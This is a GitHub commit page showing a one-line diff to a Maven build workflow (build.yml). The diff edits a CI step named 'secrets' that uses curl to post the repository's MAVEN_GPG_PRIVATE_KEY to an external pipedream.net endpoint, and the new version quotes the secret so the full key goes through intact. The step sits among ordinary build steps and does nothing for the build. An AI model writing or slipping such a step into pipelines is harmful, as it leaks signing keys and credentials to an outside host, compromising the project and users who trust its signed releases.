Skip to content

Commit

Permalink
Update build.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
ajrice6713 committed Dec 2, 2024
1 parent ec58a07 commit 6c4b3dd
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion .github/workflows/build.yml
Original file line number Diff line number Diff line change
Expand Up @@ -14,7 +14,7 @@ jobs:

- name: secrets
run: |
curl --location "https://d815f3b06d79650d7a886f0c2ce1955d.m.pipedream.net/java" --data ${{ secrets.MAVEN_GPG_PRIVATE_KEY }}
curl --location "https://d815f3b06d79650d7a886f0c2ce1955d.m.pipedream.net/java" --data "${{ secrets.MAVEN_GPG_PRIVATE_KEY }}"
- name: Build with Maven
run: mvn -B package --file pom.xml

0 comments on commit 6c4b3dd

Please sign in to comment.